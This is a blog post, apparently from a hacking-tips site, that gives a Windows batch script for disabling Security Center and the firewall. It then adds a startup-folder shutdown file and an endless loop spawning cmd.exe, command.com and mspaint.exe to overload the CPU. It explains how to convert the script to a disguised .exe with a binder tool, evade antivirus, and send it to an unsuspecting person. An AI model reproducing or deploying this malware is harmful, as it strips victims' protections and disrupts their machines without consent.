' name='google-site-verification'/> Undetectable Batch file | SOURCE CODE

[ Site Info ]

BloggerMates

Related Posts Plugin for WordPress, Blogger...

FOLLOWERS

[ Archives ]

[ Followers ]

[ Partner Link ]

portbloger.co.cc

[ Recent Comments ]

[ Advertiser ]

DMCA Protection Status

About

Ghazanfar Ali Naqvi

Pageviews

Google Talk

NetworkedBlogs

Google Translater

English French German Spain Italian Dutch Russian Portuguese Japanese Korean Arabic Chinese Simplified

this widget by www.portbloger.co.cc

Desktop Codee © Custom Search

Loading

Undetectable Batch file

Hello,this is a tutorial showing you how to make a batch file undetectable.
First,if you want to make your way thru the computer and not be seen or something,easiest way is to shutdown all firewalls/security.
To do that you have to type in the following inside Notepad:


Code:
@echo off
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable
hat will stop the Security Center
Shared Access and Firewall.

Save the file as something.bat

But this will probably fail because when the AV detects that it is a batch file it will automatically delete it.
So What to do?

Exe:

Download nBinder Pro:
Code:
h*tp://www.midload.com/en/file/29192/nbinder-rar

mirror

h*tp://rapidshare.com/files/109795148/nbinder.rar
pass
linkzshare.net
NBinder pro is a Binder/Converter/Icon Changer

Download,and open.
Click Add..
And add the batch file.
Then you can bind it with self.
By simply clicking Bind.
That will convert the batch to .exe
And then you change the icon.


Com:
Download:
Bat2COM
And convert it.

When it is converted,send it to someone,and when he runs it he will see nothing,but a cmd window open and close.
But what he doesn't see is that his firewall,security has closed.

Now,to make the batch a little more dangerous.

Code:
@echo off
net stop “Security Center”
net stop SharedAccess
netsh firewall set opmode mode=disable
echo shutdown -s >> "%systemdrive%\documents and settings\start menu\programs\startup\virus.bat"
:virus
start cmd.exe
start command.com
start mspaint.exe
goto :virus
So basically shuts down all security.
Makes a new batch file at startup which inside is the command shutdown -s
Then starts cmd.exe command.com and mspaint.exe multiple,multiple times.
Watch the CPU usage go up.


hope that helps i see a lot of ppl asking how to do this so thought i show you all



(Hack By) Ghazanfar Naqvi

0 comments:

Post a Comment

Author

Ghazanfar Ali Naqvi

Hi`i'm Ghazanfar Ali Naqvi ,from Pakistan,i love to blogging, Desing Blogger template, Web Developing and Designing.i like to learn and share technical hacking/security tips with you,i love my friends.Spread the Love Black_Twitter_Bird

Follow Me on facebook!